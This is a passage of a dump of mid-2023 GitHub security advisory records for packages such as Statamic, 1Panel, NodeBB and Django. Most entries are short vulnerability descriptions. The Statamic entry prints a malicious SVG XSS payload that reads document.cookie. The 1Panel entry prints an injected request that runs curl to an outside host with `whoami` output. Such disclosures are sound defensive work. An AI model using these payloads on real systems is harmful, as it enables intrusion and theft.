[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'RubyGems', 'name': 'decidim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.26.7'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'decidim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.27.0'}, {'fixed': '0.27.3'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'decidim-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.14.0'}, {'fixed': '0.26.7'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'decidim-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.27.0'}, {'fixed': '0.27.3'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/decidim/decidim/security/advisories/GHSA-5652-92r9-3fx9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34089'}, {'type': 'PACKAGE', 'url': 'https://github.com/decidim/decidim'}, {'type': 'WEB', 'url': 'https://github.com/decidim/decidim/releases/tag/v0.26.6'}, {'type': 'WEB', 'url': 'https://github.com/decidim/decidim/releases/tag/v0.26.7'}, {'type': 'WEB', 'url': 'https://github.com/decidim/decidim/releases/tag/v0.27.3'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/decidim-core/CVE-2023-34089.yml'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/decidim/CVE-2023-34089.yml'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:46:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f44m-65h3-99vc
|
2023-07-11T22:45:55Z
|
2023-07-11T15:31:18Z
| null |
['CVE-2023-3620']
|
tarteaucitron.js vulnerable to Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository amauric/tarteaucitron.js prior to v1.13.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'tarteaucitronjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.1'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3620'}, {'type': 'WEB', 'url': 'https://github.com/amauric/tarteaucitron.js/commit/c4c2fcf2b2212ce968bdcae145bb74283c441e5f'}, {'type': 'WEB', 'url': 'https://github.com/AmauriC/tarteaucitron.js/releases/tag/v1.13.1'}, {'type': 'PACKAGE', 'url': 'https://github.com/amauric/tarteaucitron.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/a0fd0671-f051-4d41-8928-9b19819084c9'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-11T22:45:55Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vh2g-6c4x-5hmp
|
2023-07-25T13:54:13Z
|
2023-07-25T13:54:13Z
| null |
['CVE-2023-26045']
|
Path traversal and code execution via prototype vulnerability
|
### Impact
Due to the use of the [object destructuring assignment](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Destructuring_assignment) syntax in the user export code path, combined with a path traversal vulnerability, a specially crafted payload could invoke the user export logic to arbitrarily execute javascript files on the local disk.
### Patches
Patched in v2.8.7
### Workarounds
Site maintainers can cherry pick ec58700f6dff8e5b4af1544f6205ec362b593092 into their codebase to patch the exploit.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.8.7'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-vh2g-6c4x-5hmp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26045'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/ec58700f6dff8e5b4af1544f6205ec362b593092'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230831-0004/'}]
|
{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T13:54:13Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-m384-pj54-5vr2
|
2023-07-20T14:56:45Z
|
2023-07-12T12:31:35Z
| null |
['CVE-2022-42009']
|
Apache Ambari Expression Language Injection vulnerability
|
SpringEL injection in the server agent in Apache Ambari version 2.7.0 to 2.7.6 allows a malicious authenticated user to execute arbitrary code remotely. Users are recommended to upgrade to 2.7.7.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ambari:ambari'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.7'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-42009'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ambari'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/6xf477ttz1oxmg0bx0tpdoz2mlqd7sbc'}]
|
{'cwe_ids': ['CWE-917'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-12T17:29:48Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-wx79-r3q8-fq9h
|
2023-07-06T23:28:55Z
|
2023-07-06T21:14:59Z
| null |
['CVE-2023-31066']
|
Apache InLong has Files or Directories Accessible to External Parties in Apache InLong
|
Files or Directories Accessible to External Parties vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.6.0. Different users in InLong could delete, edit, stop, and start others' sources. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7775 to solve it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-service'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.inlong:manager-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31066'}, {'type': 'WEB', 'url': 'https://github.com/apache/inlong/pull/7775'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/inlong'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/x7y05wo37sq5l9fnmmsjh2dr9kcjrcxf'}]
|
{'cwe_ids': ['CWE-552'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T23:28:55Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-hhvx-8755-4cvw
|
2023-07-06T21:54:20Z
|
2023-07-06T19:24:11Z
| null |
['CVE-2023-1296']
|
Hashicorp Nomad ACLs Cannot Deny Access to Workload’s Own Variables
|
A vulnerability was identified in Nomad and Nomad Enterprise (“Nomad”) such that a deny ACL capability could not be applied to a workload’s own variables. If included, the Nomad ACL system will silently fail to block access. This vulnerability, CVE-2023-1296, was fixed in Nomad 1.4.6 and 1.5.1.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.1'}]}], 'versions': ['1.5.0']}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1296'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-09-nomad-acls-can-not-deny-access-to-workloads-own-variables/51390'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/nomad'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:54:20Z', 'nvd_published_at': '2023-03-14T15:15:00Z'}
|
1.4.0
|
GHSA-xqr8-7jwr-rhp7
|
2023-08-03T19:36:12Z
|
2023-07-25T14:43:53Z
| null |
['CVE-2023-37920']
|
Removal of e-Tugra root certificate
|
Certifi 2023.07.22 removes root certificates from "e-Tugra" from the root store. These are in the process of being removed from Mozilla's trust store.
e-Tugra's root certificates are being removed pursuant to an investigation prompted by reporting of security issues in their systems. Conclusions of Mozilla's investigation can be found [here](https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/C-HrP1SEq1A).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'certifi'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2015.4.28'}, {'fixed': '2023.7.22'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/certifi/python-certifi/security/advisories/GHSA-xqr8-7jwr-rhp7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37920'}, {'type': 'WEB', 'url': 'https://github.com/certifi/python-certifi/commit/8fb96ed81f71e7097ed11bc4d9b19afd7ea5c909'}, {'type': 'PACKAGE', 'url': 'https://github.com/certifi/python-certifi'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/certifi/PYSEC-2023-135.yaml'}, {'type': 'WEB', 'url': 'https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/C-HrP1SEq1A'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5EX6NG7WUFNUKGFHLM35KHHU3GAKXRTG/'}]
|
{'cwe_ids': ['CWE-345'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-25T14:43:53Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-667r-p4gg-7m2q
|
2023-07-21T18:02:39Z
|
2023-07-13T18:30:35Z
| null |
['CVE-2023-37785']
|
ImpressCMS Cross-site Scripting vulnerability
|
A cross-site scripting (XSS) vulnerability in ImpressCMS v1.4.5 and before allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the `smile_code` parameter of the component `/editprofile.php`.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'impresscms/impresscms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37785'}, {'type': 'WEB', 'url': 'https://github.com/CrownZTX/cve-description'}, {'type': 'PACKAGE', 'url': 'https://github.com/ImpressCMS/impresscms'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-13T19:56:13Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9vrm-v9xv-x3xr
|
2023-07-06T21:47:39Z
|
2023-07-06T19:24:09Z
| null |
['CVE-2023-0690']
|
HashiCorp Boundary Workers Store Rotated Credentials in Plaintext Even When Key Management Service Configured
|
HashiCorp Boundary from 0.10.0 through 0.11.2 contain an issue where when using a PKI-based worker with a Key Management Service (KMS) defined in the configuration file, new credentials created after an automatic rotation may not have been encrypted via the intended KMS. This would result in the credentials being stored in plaintext on the Boundary PKI worker’s disk. This issue is fixed in version 0.12.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/boundary'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.12.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0690'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-03-boundary-workers-store-rotated-credentials-in-plaintext-even-when-key-management-service-configured/49907'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/boundary'}]
|
{'cwe_ids': ['CWE-311', 'CWE-312'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:47:39Z', 'nvd_published_at': '2023-02-08T19:15:00Z'}
|
1.4.0
|
GHSA-r54g-4qq6-chxg
|
2023-07-14T21:50:30Z
|
2023-07-14T12:30:20Z
| null |
['CVE-2023-3672']
|
webmention.js Cross-site Scripting vulnerability
|
webmention.js prior to 0.5.5 is vulnerable to cross-site scripting.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'webmention.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.5'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3672'}, {'type': 'WEB', 'url': 'https://github.com/plaidweb/webmention.js/commit/3551b66b3e40da37fee89ecf72930c5efdc53011'}, {'type': 'WEB', 'url': 'https://github.com/PlaidWeb/webmention.js/blob/9457e71433c0d2430bbe767ecc5b5837140d0ee4/static/webmention.js#L330'}, {'type': 'PACKAGE', 'url': 'https://github.com/plaidweb/webmention.js'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/75cfb7ad-a75f-45ff-8688-32a9c55179aa'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-14T21:50:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-78q2-cv3p-x9fm
|
2023-07-21T20:17:53Z
|
2023-07-21T15:30:32Z
| null |
['CVE-2023-3821']
|
Pimcore Cross-site Scripting vulnerability
|
Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.6.4.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.6.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3821'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/92811f07d39e4ad95c92003868f5f7309489d79c'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/599ba4f6-c900-4161-9127-f1e6a6e29aaa'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:17:53Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-9r25-4j77-9wc7
|
2023-07-26T21:08:12Z
|
2023-07-20T21:30:59Z
| null |
['CVE-2023-37649']
|
Cockpit CMS vulnerable to incorrect access control
|
Incorrect access control in the component `/models/Content` of Cockpit CMS v2.5.2 allows unauthorized attackers to access sensitive data.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37649'}, {'type': 'PACKAGE', 'url': 'https://github.com/Cockpit-HQ/Cockpit'}, {'type': 'WEB', 'url': 'https://github.com/Cockpit-HQ/Cockpit/releases/tag/2.6.0'}, {'type': 'WEB', 'url': 'https://www.ghostccamm.com/blog/multi_cockpit_vulns/'}]
|
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-07-21T20:22:05Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-859m-2pfx-fwhf
|
2023-08-03T19:39:23Z
|
2023-07-28T15:30:23Z
| null |
['CVE-2023-39022']
|
Code injection in oscore
|
oscore v2.2.6 and below was discovered to contain a code injection vulnerability in the component com.opensymphony.util.EJBUtils.createStateless. This vulnerability is exploited via passing an unchecked argument.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'opensymphony:oscore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39022'}, {'type': 'WEB', 'url': 'https://github.com/LetianYuan/My-CVE-Public-References/tree/main/opensymphony_oscore'}]
|
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-07-28T20:44:35Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-6r5g-cq4q-327g
|
2023-07-06T20:56:28Z
|
2023-07-06T20:56:28Z
| null |
['CVE-2023-36828']
|
Statamic's Antlers sanitizer cannot effectively sanitize malicious SVG
|
Antlers sanitizer cannot effectively sanitize malicious SVG
### Summary
The SVG tag does not sanitize malicious SVG. Therefore, an attacker can exploit this vulnerability to perform XSS attacks using SVG, even when using the `sanitize` function.
### Details
Regarding the previous discussion mentioned [here](https://github.com/statamic/cms/security/advisories/GHSA-jvw9-rrc5-39g6#advisory-comment-84322), it has been identified that the default blacklist in the **FilesFieldtypeController** (located at this [link](https://github.com/statamic/cms/blob/f806b6b007ddcf066082eef175653c5beaa96d60/src/Http/Controllers/CP/Fieldtypes/FilesFieldtypeController.php#L15)) only blocks certain file extensions such as php, php3, php4, php5, and phtml. This allows a malicious user to upload a manipulated SVG file disguised as a social media icon, potentially triggering an XSS vulnerability.
### PoC Screenshot

### PoC
1. Create new Global set, let's say "Settings"
2. Create a "Grid" field in Blueprint (named: social), then add somefields Name (text), URL (text) and Icon (Assets) in the section Fields.
3. When calling the social setting in the `_footer.antlers.html`, remember to [sanitize](https://statamic.dev/modifiers/sanitize)
```
{{ settings:social }}
<a href="{{ $url }}" class="ml-4" aria-label="{{ $name }}" rel="noopener">
{{ svg :src="icon" class="h-6 w-6 hover:text-hot-pink" | sanitize }}
</a>
{{ /settings:social }}
```
4. Upload the malicious SVG image, here is the code:
```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<text x="20" y="35">Statamic</text>
<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:confirm(document.cookie);" width="400" height="250"/>
</foreignObject>
</svg>
```
### Impact
Since the social media icon is displayed in the footer layout, any user can view it, potentially leading to the execution of XSS.
### Suggestions to Mitigate or Resolve the Issue:
Sanitize when outputing the svg. This vulnerability caused by unsanitized `File::get()` when retrieving the SVG, it is crucial to sanitize the SVG when outputting it. The issue can be found in the following file: https://github.com/statamic/cms/blob/f806b6b007ddcf066082eef175653c5beaa96d60/src/Tags/Svg.php#L36-L40.
It is highly recommended to implement proper sanitization measures to ensure the security of the SVG content. One effective approach is to utilize a reliable package, such as https://github.com/darylldoyle/svg-sanitizer ,which provides comprehensive SVG sanitization capabilities.
So the code becomes:
```php
use enshrined\svgSanitize\Sanitizer;
if (File::exists($file)) {
$sanitizer = new Sanitizer();
$dirtySVG = File::get($file);
$svg = $sanitizer->sanitize($dirtySVG);
break;
}
```
### Reference
- https://github.com/gogs/gogs/security/advisories/GHSA-ff28-f46g-r9g8
- https://huntr.dev/bounties/34a12146-3a5d-4efc-a0f8-7a3ae04b198d/
- https://blog.nintechnet.com/wordpress-elementor-plugin-fixed-svg-xss-protection-bypass-vulnerability/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'statamic/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.10.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/statamic/cms/security/advisories/GHSA-6r5g-cq4q-327g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36828'}, {'type': 'WEB', 'url': 'https://github.com/statamic/cms/pull/8408'}, {'type': 'WEB', 'url': 'https://github.com/statamic/cms/commit/c714893ad92de6e5ede17b501003441af505b30d'}, {'type': 'PACKAGE', 'url': 'https://github.com/statamic/cms'}, {'type': 'WEB', 'url': 'https://github.com/statamic/cms/blob/f806b6b007ddcf066082eef175653c5beaa96d60/src/Http/Controllers/CP/Fieldtypes/FilesFieldtypeController.php#L15'}, {'type': 'WEB', 'url': 'https://github.com/statamic/cms/blob/f806b6b007ddcf066082eef175653c5beaa96d60/src/Tags/Svg.php#L36-L40'}, {'type': 'WEB', 'url': 'https://github.com/statamic/cms/releases/tag/v4.10.0'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T20:56:28Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7x2c-fgx6-xf9h
|
2023-07-07T22:18:09Z
|
2023-07-05T21:38:53Z
| null |
['CVE-2023-36458']
|
1Panel vulnerable to command injection when entering the container terminal
|
### Impact
The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal.
1. Vulnerability analysis.
```
backend\app\api\v1\terminal.go#ContainerWsSsh
```

2. vulnerability reproduction.
```
GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1
Host: 192.168.109.152:40982
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Sec-WebSocket-Version: 13
Origin: http://192.168.109.152:40982
Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ==
Connection: keep-alive, Upgrade
Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
```
3. The successful execution of system commands.

Affected versions: <= 1.3.5
### Patches
The vulnerability has been fixed in v1.3.6.
### Workarounds
It is recommended to upgrade the version to v1.3.6.
### References
If you have any questions or comments about this advisory:
Open an issue in https://github.com/1Panel-dev/1Panel
Email us at wanghe@fit2cloud.com
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/1Panel-dev/1Panel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-7x2c-fgx6-xf9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36458'}, {'type': 'PACKAGE', 'url': 'https://github.com/1Panel-dev/1Panel'}, {'type': 'WEB', 'url': 'https://github.com/1Panel-dev/1Panel/releases/tag/v1.3.6'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-05T21:38:53Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-gm67-h5wr-w3cv
|
2023-07-06T21:44:43Z
|
2023-07-06T19:24:05Z
| null |
['CVE-2021-28655']
|
Apache Zeppelin Improper Input Validation vulnerability
|
The improper Input Validation vulnerability in `Move folder to Trash` feature of Apache Zeppelin allows an attacker to delete the arbitrary files. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.zeppelin:zeppelin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.10.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28655'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/zeppelin'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/bxs056g3xlsofz0jb3wny9dw4llwptd2'}]
|
{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-07-06T21:44:43Z', 'nvd_published_at': '2022-12-16T13:15:00Z'}
|
1.4.0
|
GHSA-jh3w-4vvf-mjgr
|
2023-07-11T16:36:02Z
|
2023-07-03T15:30:45Z
| null |
['CVE-2023-36053']
|
Django has regular expression denial of service vulnerability in EmailValidator/URLValidator
|
In Django 3.2 before 3.2.20, 4 before 4.1.10, and 4.2 before 4.2.3, `EmailValidator` and `URLValidator` are subject to a potential ReDoS (regular expression denial of service) attack via a very large number of domain name labels of emails and URLs.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.core.validators.URLValidator', 'django.core.validators.EmailValidator']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.20'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.core.validators.URLValidator', 'django.core.validators.EmailValidator']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.core.validators.URLValidator', 'django.core.validators.EmailValidator']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2'}, {'fixed': '4.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0'}, {'fixed': '4.1.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2'}, {'fixed': '3.2.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36053'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/454f2fb93437f98917283336201b4048293f7582'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/ad0410ec4f458aa39803e5f6b9a3736527062dcd'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/b7c5feb35a31799de6e582ad6a5a91a9de74e0f9'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/beb3f3d55940d9aa7198bf9d424ab74e873aec3d'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/4.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2023-100.yaml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00022.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5465'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2023/jul/03/security-releases/'}]
|
